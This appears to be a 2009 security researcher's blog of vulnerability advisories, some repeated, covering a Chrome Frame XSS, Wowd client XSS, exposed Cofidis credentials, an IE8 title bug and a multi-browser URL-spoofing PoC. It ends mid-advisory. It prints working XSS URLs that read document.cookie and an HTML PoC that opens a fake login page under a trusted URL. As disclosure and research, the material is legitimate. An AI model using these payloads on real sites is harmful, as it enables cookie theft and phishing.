#####################################
Google Chrome Frame null domain XSS
vendor url:http://www.google.com/chromeframe
vendor changelog:http://googlechromereleases.blogspot.com/
2009/11/google-chrome-frame-update-bug-fixes.html
Advisore:http://lostmon.blogspot.com/
2009/11/google-chrome-frame-null-domain-xss.html
Vendor notify:yes Exploit available:YES
######################################
######################
Description by vendor
######################
Google Chrome Frame is a free plug-in for Internet Explorer.
Some advanced web apps, like Google Wave, use Google Chrome
Frame to provide you with additional features and better performance.
Google Chrome Frame is an early-stage open source
plug-in that seamlessly brings Google Chrome's open
web technologies and speedy JavaScript engine to
Internet Explorer.
################
version Afected
################
4.0.223.9 (Official Build 29618)
WebKit: 532.3
V8: 1.3.16
User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
AppleWebKit/532.3 (KHTML, like Gecko) Chrome/4.0.223.9 Safari/532.3
Not afected version:
4.0.245.1 (Official Build 31970)
WebKit: 532.5
V8: 1.3.18.6
User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.245.1 Safari/532.5
you can find aditional information here:
http://googlechromereleases.blogspot.com/
2009/11/google-chrome-frame-update-bug-fixes.html
#####################
Cross Site scripting
#####################
Create a html document and some to test =>
<iframe src="javascript:alert(1)></iframe>
=> this opens the iframe and execute the alert
( this is correct)
<iframe src="cf:javascript:alert(1)></iframe>
this does not work , not show the alert ( correct)
and here is the flaw =>
<iframe src="cf:view-source:javascript:alert(1)></iframe>
This show & executed the alert it works on local & remote
scenario or via address bar too.
This bypassed cross-origin protections !!!
For google chrome browser test this
at the address bar =>
view-source:javascript:alert(1)
this execute the alert but recently google has made changes
in about:blank page and this issue is only exploitable
via address bar ,not in a iframe or frame or html document
so for that i think that this issue isn´t exploitable in a
remote scenario.
###########
crashes
###########
cf:view-source:about@: crash
cf:about@: => crashing the tab
##########
Solution
############
Google has automatic release a new version
of Chrome Frame 4.0.245.1 (Official Build 31970)
and this version is not afected.
#################€nd#############
Thnx to estrella To be mi ligth
Thnx To icar0 & sha0 from Badchecksum
Thnx To Google security Team
atentamente:
Security Research & Analisys.
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Google Chrome Frame null domain XSS
Thursday, November 19, 2009
Categories:
Acknowledgments,
browsers,
bug,
crash,
security,
vulnerability,
XSS
Wowd search client multiple variable xss
Tuesday, October 27, 2009
##########################################
Wowd search client multiple variable xss
Vendor URL: http://www.wowd.com/
Advisore:http://lostmon.blogspot.com/2009/10/
wowd-search-client-multiple-variable.html
Vendor notify:yes exploit available:yes
##########################################
################
What is Wowd?
################
Wowd is a real-time search engine for discovering
what's popular on the web right now.
In essence, the company has made a peer-to-peer
search engine powered by what other Wowd users
are looking at online rather than studying and
ranking sites based on an arcane link structure.
Taking search and breaking it into millions of
tiny pieces all run by individual users who have
downloaded the Wowd client completely changes
the operation -- and economics -- of a search
engine. The more times that someone in the Wowd
crowd clicks on a link within a recent time
frame, the higher the link's ranking.
##########################
Vulnerability description
##########################
Wowd client contains a flaw that allows a remote
cross site scripting attack.This flaw exists because
the application does not validate In the URI dialog
'sortby' 'tags' and 'ctx' variables upon submision to
'index.html' script. This could allow a user to create
a specially crafted URL that would execute arbitrary
code in a user's browser within the trust relationship
between the browser and the server,leading loss of integrity.
This issue can be dangerous , because if you are running
Wowd client , you have all of this vulnerabilities because
this issue can be exploited accross all browsers,
include ie8 with the XSS filter ( WoW ! )
#################
Versions
################·
Wowd client 1.3.0 vulnerable
Wowd client 1.3.1 Not vulnerable
#################
SOLUTION
#################
Upgrade to version 1.3.1 or higher, as it has been
reported to fix this vulnerability. An upgrade is
required as there are no known workarounds.
###################
Proof of Concept.
###################
#############
Test
#############
I test it in ie8, firefox 3.5.3 and safari 4
in all cases the xss is executed include ie8 with xss filter :D
a remote user can compose a html document
with a iframe and this source for the iframe:
http://localhost:8101/wowd/index.html?search&sortby=rank%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
the browser executes the xss ,if you access directly to
this url the xss is executed too.
aditionaly wen wowd show his results , we have a functionality
to add "tags" to a url.
Example:
http://localhost:8101/wowd/index.html?search&query=a&
sortby=rank&tags=english|S0B0707656E676C6973680D02
this shows a indexed search with tag 'english' we can add a
crafted tag that allow to execute a xss like:[tag]|[token]
example:
http://localhost:8101/wowd/index.html?search&query=a
&sortby=rank&tags=english|S0B0707656E676C6973680D02,
%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E|S0B0707656E676C6973680D02
and it executed the xss in the tags labels.
ctx variable is also afected too
http://localhost:8101/wowd/index.html?search&page=2&q=
&sortby=rank&tags=news|S0807046E6577730D02&ctx=1995393737681%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
############## €nd ###################
Thnx To estrella to be my light
Thnx to all Lostmon Team !
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
----------------------------------------------
Browser: Internet Explorer 8 (Windows)
Browser: Firefox 3.5 (Windows)
Browser: Safari 4 (Windows)
Wowd search client multiple variable xss
Vendor URL: http://www.wowd.com/
Advisore:http://lostmon.blogspot.com/2009/10/
wowd-search-client-multiple-variable.html
Vendor notify:yes exploit available:yes
##########################################
################
What is Wowd?
################
Wowd is a real-time search engine for discovering
what's popular on the web right now.
In essence, the company has made a peer-to-peer
search engine powered by what other Wowd users
are looking at online rather than studying and
ranking sites based on an arcane link structure.
Taking search and breaking it into millions of
tiny pieces all run by individual users who have
downloaded the Wowd client completely changes
the operation -- and economics -- of a search
engine. The more times that someone in the Wowd
crowd clicks on a link within a recent time
frame, the higher the link's ranking.
##########################
Vulnerability description
##########################
Wowd client contains a flaw that allows a remote
cross site scripting attack.This flaw exists because
the application does not validate In the URI dialog
'sortby' 'tags' and 'ctx' variables upon submision to
'index.html' script. This could allow a user to create
a specially crafted URL that would execute arbitrary
code in a user's browser within the trust relationship
between the browser and the server,leading loss of integrity.
This issue can be dangerous , because if you are running
Wowd client , you have all of this vulnerabilities because
this issue can be exploited accross all browsers,
include ie8 with the XSS filter ( WoW ! )
#################
Versions
################·
Wowd client 1.3.0 vulnerable
Wowd client 1.3.1 Not vulnerable
#################
SOLUTION
#################
Upgrade to version 1.3.1 or higher, as it has been
reported to fix this vulnerability. An upgrade is
required as there are no known workarounds.
###################
Proof of Concept.
###################
#############
Test
#############
I test it in ie8, firefox 3.5.3 and safari 4
in all cases the xss is executed include ie8 with xss filter :D
a remote user can compose a html document
with a iframe and this source for the iframe:
http://localhost:8101/wowd/index.html?search&sortby=rank%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
the browser executes the xss ,if you access directly to
this url the xss is executed too.
aditionaly wen wowd show his results , we have a functionality
to add "tags" to a url.
Example:
http://localhost:8101/wowd/index.html?search&query=a&
sortby=rank&tags=english|S0B0707656E676C6973680D02
this shows a indexed search with tag 'english' we can add a
crafted tag that allow to execute a xss like:[tag]|[token]
example:
http://localhost:8101/wowd/index.html?search&query=a
&sortby=rank&tags=english|S0B0707656E676C6973680D02,
%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E|S0B0707656E676C6973680D02
and it executed the xss in the tags labels.
ctx variable is also afected too
http://localhost:8101/wowd/index.html?search&page=2&q=
&sortby=rank&tags=news|S0807046E6577730D02&ctx=1995393737681%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
############## €nd ###################
Thnx To estrella to be my light
Thnx to all Lostmon Team !
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
----------------------------------------------
Browser: Internet Explorer 8 (Windows)
Browser: Firefox 3.5 (Windows)
Browser: Safari 4 (Windows)
Cofidis.es pudo ver sus datos comprometidos
Thursday, October 15, 2009
###########################################
Cofidis.es pudo ver sus datos comprometidos
Vendor: www.cofidis.es
Falla: cedenciales criticas al descubierto
Actualizado:13-02-2010
###########################################
Cofidis es una empresa formada por varios grupos de
crédito que agrupan diferentes servicios dentro del
panorama de finanzas mundiales.
La definición según podemos leer en su web:
"Somos líderes europeos del crédito por teléfono:
tenemos más de 8 millones de clientes. En España, Ya
contamos con más de 15 años de experiencia y un equipo
de más de 800 colaboradores."
Cofidis.es pudo verse afectado por un fallo atraves del
cual podrían terceras personas haber podido tener acceso
a datos de carácter personal, al haber dejado al descubierto
las credenciales de acceso root al portal y así mismo al dejar
al descubierto las credenciales de acceso a la base de datos
del portal.
Para hacernos una idea de qué tipo de datos pueden haber sido
vistos o "robados" por terceros, tan solo debemos mirar uno de
los formularios de solicitud de crédito, y por los datos que
se nos piden se puede saber qué tipo de datos podría contener
la base de datos.
https://www.espaciocliente.cofidis.es/cofidis/preapprove/PreApproveContractDisplayAction.do
Esta noticia Llego a mí, después observar un post en Twitter
en el cual se daba una url del portal Cofidis.es y el acceso
a un txt sin ningún tipo de protección, y el cual contenía
las credenciales antes mencionadas.
Después de observar esta situación, y hablado con algunos de
los miembros del grupo de discusión e investigación, decidimos
mirar desde cuando podía haberse dado esta circunstancia y el
posible origen de la noticia. Haciendo una búsqueda rápida en
los motores de búsqueda habituales
##################
Actualizacion
##################
al parecer la primera noticia sobre
esta circunstlancia podria ser este post
en un blog en el cual se habla del tema
sin revelar en si las direcciones directas.
Los Post de twiter habrian podido sacar la
informacion para sus post
el post es del dia 11-10-2009
http://86400.es/2009/10/11/
la-seguridad-de-los-que-manejan-nuestro-dinero/
#################################
Llegamos a un Post en twitter del día 12-10-2009.
Y uno posterior del día 13-10-2009.
y otro mas el dia 13-10-2009
El día 14-10-2009 por la tarde el txt que contenía estas
credenciales fue retirado del raíz del portal cofidis.es
Con lo cual se puede pensar que esos datos tan sensibles
pudieron estar al alcance de todo el mundo durante al
menos tres días.
Google muestra en su cache, una imagen de dicho documento
con fecha Del día 13-10-2009 mostrando las credenciales
http://209.85.229.132/search?q=cache:nrpZAY7spqYJ:www.cofidis.es/xxxxx.txt+http://www.cofidis.es/xxxx.txt&cd=8&hl=es&ct=clnk&gl=es
Pero esta sería la fecha en la cual google tomo esa instantánea
de ese documento, pudiendo haber reemplazado a una anterior eso
Los logs del servidor de cofidis deberían mostrar cuando fue la
primera vez que el spider de google pudo rastrear ese txt.
Así mismo si realizamos una búsqueda en google por el fichero txt
entre los resultados primeros puede apreciarse que Google también
revela esas credenciales faltaría saber cuando fue incluido en la
Indexación ese archivo, para intentar averiguar desde que fecha se
pudo haberse producido esta situación.
http://www.google.es/search?q=cofidis.txt
Como pudo Un administrador dejar deliberadamente un archivo
con información tan sensible a la vista de cualquier visitante,
se preguntara más de uno.
Seguramente el admin no sabía nada de la existencia de ese
fichero, o eso creemos o queremos creer) Debió ser un hackeo,
por el tipo de fichero generado y su disposición y los datos
que contiene podría haberse tratado de algún agujero de
seguridad en la web , atraves del cual el atacante hubiese
podido incluir algún archivo externo.
(esta vulnerabilidad es conocida como RFI o remote file include)
pues hay algunos scripts de los que corren por la red, que
justamente hacen eso y mirando su fuente se puede observar que
justamente sacan esos datos de la maquina o inyectan una
Shell en php.
Creo que cofidis debería dar explicaciones de este hecho y así
mismo debería verse como le afecta este acontecimiento a cofidis,
ante la LOPD
y que datos han sido comprometidos, no por mi porque por suerte
yo no me encuentro en su base de datos que yo sepa, pues nunca
necesite sus servicios.
Desde el grupo de investigación y desarrollo de Lostmon's
Groups queremos hacer un llamamiento a que las empresas como
cofidis y otras que trabajan con datos personales tan
sensibles y de tanta confidencialidad, deberían invertir
parte de sus beneficios en asegurar que esos datos no estarán
accesibles y deberían hacer lo posible por protegerlos como
se les pide en la LOPD.
Bien es cierto que en seguridad, no hay nada seguro, o que
lo bonito de la seguridad es la inseguridad que trae por si
misma. Y bien es cierto que por mucho que los administradores
pongan énfasis y empeño en asegurar servicios y sistemas,
siempre hay gente, que va por delante de ellos.
Este analisis ha sido realizado por Climbo y por Lostmon
thank to all Lostmon groups team
Thnx to estrella to be my ligth
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Cofidis.es pudo ver sus datos comprometidos
Vendor: www.cofidis.es
Falla: cedenciales criticas al descubierto
Actualizado:13-02-2010
###########################################
Cofidis es una empresa formada por varios grupos de
crédito que agrupan diferentes servicios dentro del
panorama de finanzas mundiales.
La definición según podemos leer en su web:
"Somos líderes europeos del crédito por teléfono:
tenemos más de 8 millones de clientes. En España, Ya
contamos con más de 15 años de experiencia y un equipo
de más de 800 colaboradores."
Cofidis.es pudo verse afectado por un fallo atraves del
cual podrían terceras personas haber podido tener acceso
a datos de carácter personal, al haber dejado al descubierto
las credenciales de acceso root al portal y así mismo al dejar
al descubierto las credenciales de acceso a la base de datos
del portal.
Para hacernos una idea de qué tipo de datos pueden haber sido
vistos o "robados" por terceros, tan solo debemos mirar uno de
los formularios de solicitud de crédito, y por los datos que
se nos piden se puede saber qué tipo de datos podría contener
la base de datos.
https://www.espaciocliente.cofidis.es/cofidis/preapprove/PreApproveContractDisplayAction.do
Esta noticia Llego a mí, después observar un post en Twitter
en el cual se daba una url del portal Cofidis.es y el acceso
a un txt sin ningún tipo de protección, y el cual contenía
las credenciales antes mencionadas.
Después de observar esta situación, y hablado con algunos de
los miembros del grupo de discusión e investigación, decidimos
mirar desde cuando podía haberse dado esta circunstancia y el
posible origen de la noticia. Haciendo una búsqueda rápida en
los motores de búsqueda habituales
##################
Actualizacion
##################
al parecer la primera noticia sobre
esta circunstlancia podria ser este post
en un blog en el cual se habla del tema
sin revelar en si las direcciones directas.
Los Post de twiter habrian podido sacar la
informacion para sus post
el post es del dia 11-10-2009
http://86400.es/2009/10/11/
la-seguridad-de-los-que-manejan-nuestro-dinero/
#################################
Llegamos a un Post en twitter del día 12-10-2009.
Y uno posterior del día 13-10-2009.
y otro mas el dia 13-10-2009
El día 14-10-2009 por la tarde el txt que contenía estas
credenciales fue retirado del raíz del portal cofidis.es
Con lo cual se puede pensar que esos datos tan sensibles
pudieron estar al alcance de todo el mundo durante al
menos tres días.
Google muestra en su cache, una imagen de dicho documento
con fecha Del día 13-10-2009 mostrando las credenciales
http://209.85.229.132/search?q=cache:nrpZAY7spqYJ:www.cofidis.es/xxxxx.txt+http://www.cofidis.es/xxxx.txt&cd=8&hl=es&ct=clnk&gl=es
Pero esta sería la fecha en la cual google tomo esa instantánea
de ese documento, pudiendo haber reemplazado a una anterior eso
Los logs del servidor de cofidis deberían mostrar cuando fue la
primera vez que el spider de google pudo rastrear ese txt.
Así mismo si realizamos una búsqueda en google por el fichero txt
entre los resultados primeros puede apreciarse que Google también
revela esas credenciales faltaría saber cuando fue incluido en la
Indexación ese archivo, para intentar averiguar desde que fecha se
pudo haberse producido esta situación.
http://www.google.es/search?q=cofidis.txt
Como pudo Un administrador dejar deliberadamente un archivo
con información tan sensible a la vista de cualquier visitante,
se preguntara más de uno.
Seguramente el admin no sabía nada de la existencia de ese
fichero, o eso creemos o queremos creer) Debió ser un hackeo,
por el tipo de fichero generado y su disposición y los datos
que contiene podría haberse tratado de algún agujero de
seguridad en la web , atraves del cual el atacante hubiese
podido incluir algún archivo externo.
(esta vulnerabilidad es conocida como RFI o remote file include)
pues hay algunos scripts de los que corren por la red, que
justamente hacen eso y mirando su fuente se puede observar que
justamente sacan esos datos de la maquina o inyectan una
Shell en php.
Creo que cofidis debería dar explicaciones de este hecho y así
mismo debería verse como le afecta este acontecimiento a cofidis,
ante la LOPD
y que datos han sido comprometidos, no por mi porque por suerte
yo no me encuentro en su base de datos que yo sepa, pues nunca
necesite sus servicios.
Desde el grupo de investigación y desarrollo de Lostmon's
Groups queremos hacer un llamamiento a que las empresas como
cofidis y otras que trabajan con datos personales tan
sensibles y de tanta confidencialidad, deberían invertir
parte de sus beneficios en asegurar que esos datos no estarán
accesibles y deberían hacer lo posible por protegerlos como
se les pide en la LOPD.
Bien es cierto que en seguridad, no hay nada seguro, o que
lo bonito de la seguridad es la inseguridad que trae por si
misma. Y bien es cierto que por mucho que los administradores
pongan énfasis y empeño en asegurar servicios y sistemas,
siempre hay gente, que va por delante de ellos.
Este analisis ha sido realizado por Climbo y por Lostmon
thank to all Lostmon groups team
Thnx to estrella to be my ligth
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
IE8 Save as Title Bug
Wednesday, September 16, 2009
IE8 is have a bug thats allow denial access to
function "save as" if a html document have a very
long title.
By default wen a user try to clik in "save as "
the browser use the html title as the file name to
save; but if this title is very long , explorer give
a error because it can´t save this file.
Explorer can´t save files with the title longer
than 261 characters , them explorer give a warning
with a error that the file can´t save.
I think that this not have any security implication,
and i send it to MSRC and they think the same.
MSRC Response:
"agree with your assessment that this does not appear to
be a security issue. It may be a bug though so I am going
to forward your information directly to the product team
for considerations in a future non-security update"
a simple PoC of this situation:
<HTML>
<TITLE>A*261 chars</TITLE>
<HTML>
###########End #################
thank to all Lostmon groups team
Thnx to estrella to be my ligth
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
function "save as" if a html document have a very
long title.
By default wen a user try to clik in "save as "
the browser use the html title as the file name to
save; but if this title is very long , explorer give
a error because it can´t save this file.
Explorer can´t save files with the title longer
than 261 characters , them explorer give a warning
with a error that the file can´t save.
I think that this not have any security implication,
and i send it to MSRC and they think the same.
MSRC Response:
"agree with your assessment that this does not appear to
be a security issue. It may be a bug though so I am going
to forward your information directly to the product team
for considerations in a future non-security update"
a simple PoC of this situation:
<HTML>
<TITLE>A*261 chars</TITLE>
<HTML>
###########End #################
thank to all Lostmon groups team
Thnx to estrella to be my ligth
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Security Researcher Acknowledgments from Microsoft
Tuesday, September 01, 2009Security Researcher Acknowledgments
for Microsoft Online Services
The Microsoft Security Response Center (MSRC) is pleased to recognize the security researchers who have helped make Microsoft online services safer by finding and reporting security vulnerabilities. Each name listed represents an individual or company who has responsibly disclosed one or more security vulnerabilities in our online services and worked with us to remediate the issue.
http://technet.microsoft.com/en-us/security/cc308575.aspx#0809August 2009 Security Researchers
- Lostmon Lords
lostmon.blogspot.com - Knuchel Steven
xylitol.free.fr - Nenad Vijatov
blog.vijatov.com
--
thank to all Lostmon groups team
Thnx to estrella to be my ligth
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Multiple Browsers Fake url folder & file Same origin Spoof
Saturday, August 15, 2009
#########################################
Multiple Browsers Fake url folder & file Same origin Spoof
Original Article:http://lostmon.blogspot.com/
2009/08/multiple-browsers-fake-url-folder-file.html
##########################################
##############
Abstract
##############
One user open his browser and try to navigate to
http://www.host.com/admin/admin.php this url is in
the remote server and if the user has privileges ,
can access to file admin.php
If the file admin.php isn`t in the server
the user get a 404 http error by server.
If the user try to browse http://www.host.com/admin/
and this path isn´t in the server , the user get again a 404
http error.
If the user press refresh button the page reloads the content
and if the user press ctrl+f5 it refresh all content from
the page.
Some times those http errors like 404 ,403 etc are managed
by a third part app, a toolbar, or with a predefined
dynamic content build inside the browser.
#######################
Explanation
#######################
Multiple browsers have a flaw in this request response
that allow a attacker to spoof the url or spoof the content
from a inexistent file or path or spoof the url and content
from a trust file or Path.
Also a attacker can "trap" the broser in spoofed web and
wen the user press f5 or refresh button , the page show
the spoofed content or if the user press ctrl+f5 the page
show the spoofed content , Only in Opera Browser this last
issue does not work.
##################
Testing
##################
I test it with windows xp home sp3 fully patched.
for testing let´s to write some script like:
####################
SOURCE CODE OF POC
####################
online PoC =>http://cmspatch.200u.com/urlspoof.html
######## END SOURCE #####
Save it as c:/test/urlspoof.html for example.
I use one alert for show the real window.location.
for testing i have open the file using file:/// protocol handler
and for remote test i have upload the file to a server.
to a apache in windows 2003 and in a apache on linux red hat.
server windows:
Windows Server 2003
Apache/2.2.8 Win32
PHP/5.2.6
Server at ***********.com
server linux:
Apache/2.2.11 (Unix) mod_ssl/2.2.11
OpenSSL/0.9.8e-fips-rhel5
mod_auth_passthrough/2.1
FrontPage/5.0.2.2635 Server
at ***********.com
in all test cases the server send the correct
http response.
########################
Localy afected Browsers
########################
For this test i use file protocol handler and
only test file spoof and path spoof.
1 - Firefox 3.5.1 and 3.5.2
open urlspoof via file c:/test/urlspoof.html and click
in any spoof function in al cases firefox show the spoofed
url and content.(firefox 3.5.2 seems not vulnerble)
2 - Lunascape 5.1.3 and 5.1.4 (swiched to Trident engine)
open urlspoof via file c:/test/urlspoof.html and click
in any spoof function in al cases Lunascape show the
spoofed url and content spoofed.
3 - Orca browser 1.2 build 2 seems not vulnerable ,but wen browse the file
the browsers add to url wyciwyg://4/ and executes the fake content.
4 - Flock 2.5.1
open urlspoof via file c:/test/urlspoof.html and clik
in any spoof function in all cases Flock show the
spoofed url and content spoofed.
5 - K-Meleon 1.5.3
open urlspoof via file c:/test/urlspoof.html and click
in any spoof function in all cases K-Meleon show the
spoofed url and content spoofed.
6 - SeaMonkey 1.1.17
open urlspoof via file c:/test/urlspoof.html and click
in any spoof function in all cases SeaMonkey show the
spoofed url and content spoofed.
7 - Avant browser 11.7 build 36
open urlspoof via file c:/test/urlspoof.html and click
in any spoof function in all cases Avant show the
spoofed url and content spoofed.
Google chrome 2.0.172.39 (Build oficial )
write in all tree cases in about:blank.
Internet Explorer 8 seems not vulnerable via file: protocol
########################
Remote afected Browsers
########################
For this test up the file to a server
and browse to file via http://host.com/urlspoof.html
1 - Internet explorer 7 and 8
Browse to file and click in any link, the browser in all
tree test show the spoofed file, spoofed path , and "pseudo-bypass"
auth basic protection.
2 - Avant browser 11.7 build 35 and build 36
Browse to file and click in any link, the browser in all
tree test show the spoofed file, spoofed path , and "pseudo-bypass"
auth basic protection.
3 - Lunascape 5.1.3 and 5.1.4 (swiched to Trident engine)
Browse to file and click in any link, the browser in all
tree test show the spoofed file, spoofed path , and "pseudo-bypass"
auth basic protection.
4 - Maxthon Browser 2.5.3.80 UNICODE
Browse to file and click in any link, the browser in all
tree test show the spoofed file, spoofed path , and "pseudo-bypass"
auth basic protection.
Google chrome write in all cases in about:blank
#################
Trap issue
#################
All of afected browsers , wen you are in the Fake url
wen you try to reload or refresh the location , via ctrl+f5
or f5 or similar the browser not show a 404 http error,
it continue showing the fake page location.
it is very interesting , because a attacker can create a "ghost" file
in a "ghost" path.
in the case of the fake File, we can spoof any web page on the server
with the fake page and wen the user try to reload it or refresh
the browser shows the fake page not the real page location.
##################€nd ##################
Thnx to cLimbo for Spread the Word
Thnx to estrella to be my ligth.
Thnx to all Lostmon Groups Team.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Multiple Browsers Fake url folder & file Same origin Spoof
Original Article:http://lostmon.blogspot.com/
2009/08/multiple-browsers-fake-url-folder-file.html
##########################################
##############
Abstract
##############
One user open his browser and try to navigate to
http://www.host.com/admin/admin.php this url is in
the remote server and if the user has privileges ,
can access to file admin.php
If the file admin.php isn`t in the server
the user get a 404 http error by server.
If the user try to browse http://www.host.com/admin/
and this path isn´t in the server , the user get again a 404
http error.
If the user press refresh button the page reloads the content
and if the user press ctrl+f5 it refresh all content from
the page.
Some times those http errors like 404 ,403 etc are managed
by a third part app, a toolbar, or with a predefined
dynamic content build inside the browser.
#######################
Explanation
#######################
Multiple browsers have a flaw in this request response
that allow a attacker to spoof the url or spoof the content
from a inexistent file or path or spoof the url and content
from a trust file or Path.
Also a attacker can "trap" the broser in spoofed web and
wen the user press f5 or refresh button , the page show
the spoofed content or if the user press ctrl+f5 the page
show the spoofed content , Only in Opera Browser this last
issue does not work.
##################
Testing
##################
I test it with windows xp home sp3 fully patched.
for testing let´s to write some script like:
####################
SOURCE CODE OF POC
####################
online PoC =>http://cmspatch.200u.com/urlspoof.html
<html> <head></head><body> <title>Multiple Browsers Fake url folder & file Same Origin Spoof</title> <center> <h1>Multiple Browsers Fake url folder & file Same origin Spoof By Lostmon</h1> </center> <p> <a href='modules/profile/admin/admin.php' target='_blank'><h2>real path</h3></a> <a href='javascript:spoofolder()'><h2>spoof a url folder !!</h2></a> Non existent path <a href='javascript:spoofile()'><h2>spoof a url file !!</h2></a> this file exist in the server. <a href='javascript:spoofauth()'><h2>spoof a url with auth basic !!</h2></a><br>only exist Protected and have password. <p></p> <strong>pass for the cms. user Dismark pass souaktendio.</strong><br> <strong>pass for Portected folder. user terrapro pass mayoristas.</strong> <p> <script> function spoofolder() { a = window.open('modules/login') a.document.write('<H1>FAKE LOGIN PAGE<\h1>') a.document.write('<title>FAKE LOGIN PAGE</title>') a.alert(document.location) a.stop(); } function spoofile() { a = window.open('modules/system/admin.php') a.document.write('<H1>FAKE LOGIN PAGE<\h1>') a.document.write('<title>FAKE LOGIN PAGE</title>') a.alert(document.location) a.stop(); } function spoofauth() { a = window.open('protected/admin/admin.php') a.document.write('<H1>FAKE LOGIN PAGE<\h1>') a.document.write('<title>FAKE LOGIN PAGE</title>') a.alert(document.location) a.stop(); } </script> </body></html>
######## END SOURCE #####
Save it as c:/test/urlspoof.html for example.
I use one alert for show the real window.location.
for testing i have open the file using file:/// protocol handler
and for remote test i have upload the file to a server.
to a apache in windows 2003 and in a apache on linux red hat.
server windows:
Windows Server 2003
Apache/2.2.8 Win32
PHP/5.2.6
Server at ***********.com
server linux:
Apache/2.2.11 (Unix) mod_ssl/2.2.11
OpenSSL/0.9.8e-fips-rhel5
mod_auth_passthrough/2.1
FrontPage/5.0.2.2635 Server
at ***********.com
in all test cases the server send the correct
http response.
########################
Localy afected Browsers
########################
For this test i use file protocol handler and
only test file spoof and path spoof.
1 - Firefox 3.5.1 and 3.5.2
open urlspoof via file c:/test/urlspoof.html and click
in any spoof function in al cases firefox show the spoofed
url and content.(firefox 3.5.2 seems not vulnerble)
2 - Lunascape 5.1.3 and 5.1.4 (swiched to Trident engine)
open urlspoof via file c:/test/urlspoof.html and click
in any spoof function in al cases Lunascape show the
spoofed url and content spoofed.
3 - Orca browser 1.2 build 2 seems not vulnerable ,but wen browse the file
the browsers add to url wyciwyg://4/ and executes the fake content.
4 - Flock 2.5.1
open urlspoof via file c:/test/urlspoof.html and clik
in any spoof function in all cases Flock show the
spoofed url and content spoofed.
5 - K-Meleon 1.5.3
open urlspoof via file c:/test/urlspoof.html and click
in any spoof function in all cases K-Meleon show the
spoofed url and content spoofed.
6 - SeaMonkey 1.1.17
open urlspoof via file c:/test/urlspoof.html and click
in any spoof function in all cases SeaMonkey show the
spoofed url and content spoofed.
7 - Avant browser 11.7 build 36
open urlspoof via file c:/test/urlspoof.html and click
in any spoof function in all cases Avant show the
spoofed url and content spoofed.
Google chrome 2.0.172.39 (Build oficial )
write in all tree cases in about:blank.
Internet Explorer 8 seems not vulnerable via file: protocol
########################
Remote afected Browsers
########################
For this test up the file to a server
and browse to file via http://host.com/urlspoof.html
1 - Internet explorer 7 and 8
Browse to file and click in any link, the browser in all
tree test show the spoofed file, spoofed path , and "pseudo-bypass"
auth basic protection.
2 - Avant browser 11.7 build 35 and build 36
Browse to file and click in any link, the browser in all
tree test show the spoofed file, spoofed path , and "pseudo-bypass"
auth basic protection.
3 - Lunascape 5.1.3 and 5.1.4 (swiched to Trident engine)
Browse to file and click in any link, the browser in all
tree test show the spoofed file, spoofed path , and "pseudo-bypass"
auth basic protection.
4 - Maxthon Browser 2.5.3.80 UNICODE
Browse to file and click in any link, the browser in all
tree test show the spoofed file, spoofed path , and "pseudo-bypass"
auth basic protection.
Google chrome write in all cases in about:blank
#################
Trap issue
#################
All of afected browsers , wen you are in the Fake url
wen you try to reload or refresh the location , via ctrl+f5
or f5 or similar the browser not show a 404 http error,
it continue showing the fake page location.
it is very interesting , because a attacker can create a "ghost" file
in a "ghost" path.
in the case of the fake File, we can spoof any web page on the server
with the fake page and wen the user try to reload it or refresh
the browser shows the fake page not the real page location.
##################€nd ##################
Thnx to cLimbo for Spread the Word
Thnx to estrella to be my ligth.
Thnx to all Lostmon Groups Team.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Bing.com WebmasterAuthenticationInformationPage.aspx XSS
Thursday, August 13, 2009
###########################################
Bing.com WebmasterAuthenticationInformationPage.aspx XSS
vendor url:http://ww.bing.com
advisore:http://lostmon.blogspot.com/2009/08/
bingcom-webmasterauthenticationinformat.html
vendor notify: yes vendor confirmed:yes
###########################################
Bing search engine contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does not
validate properly 'authTag' variable upon submission to the
'WebmasterAuthenticationInformationPage.aspx' script.This could
allow a user to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust relationship
between the browser and the server,leading to a loss of integrity.
them a attacker can compose a malformed link in the variable
from WebmasterAuthenticationInformationPage.aspx and Look the
result code , it is write in two boxes and in the file
'LiveSearchSiteAuth.xml'
A remote user can compose a malformed link in the variable
from WebmasterXMLAuthDownloadPage.aspx ,wen download file
